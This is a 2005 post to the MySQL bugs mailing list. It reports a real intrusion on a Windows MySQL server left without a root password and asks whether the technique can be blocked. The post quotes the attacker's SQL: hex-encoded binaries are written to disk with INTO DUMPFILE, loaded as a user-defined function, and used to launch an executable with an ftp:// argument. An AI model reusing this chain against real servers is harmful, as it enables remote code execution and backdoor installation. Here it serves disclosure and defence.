Possible vulnerability under Win32?
am 13.01.2005 10:01:02 von MesdagBefore we continue, this is data extracted from a real life hack.
This is not on my own system but on a remote system running Windows XP
Pro SP1 and running MySQL, Version: 4.1.3-beta-nt-max-log.
The hacker gained entry due to a missing root password. (yeah i know, it
is stupid; again this was not my system) and installed software for a
backdoor and other stuff.
Yet this made me think:
Can any user run programs as in the example below?
Can you turn this behaviour off? (The manual states that GRANT EXECUTE
is not yet implemented)
Can this result be replicated with SQL injection (often used to hack
phpbb boards)?
Are *nix use also vulnerable to this?
Note: the ip is removed and the inserted data is also shortened. The
data contains hex and forms a ftp client. The other filenames are purely
fictional
The queries:
DROP TABLE IF EXISTS filedata3
CREATE TABLE filedata3 (
filedata3 blob NOT NULL
) TYPE=MyISAM
Insert Into filedata3 (filedata3) values
(0x4D5A50000200000004....000000000000000)
SELECT filedata3 FROM filedata3 INTO DUMPFILE 'c:\\test.dll'
drop table filedata3
DROP TABLE IF EXISTS filedata5
CREATE TABLE filedata5 (
filedata5 blob NOT NULL
) TYPE=MyISAM
Insert Into filedata5 (filedata5) values
(0x4D5A50000200000004...000000000000000)
SELECT filedata5 FROM filedata5 INTO DUMPFILE 'c:\\yada.exe'
drop table filedata5
create function my_name returns string soname
'c:\\test.dll'
select my_name('start c:\\yada.exe ftp://
Mesdag
--
MySQL Bugs Mailing List
For list archives: http://lists.mysql.com/bugs
To unsubscribe: http://lists.mysql.com/bugs?unsub=gcdmb-bugs@m.gmane.org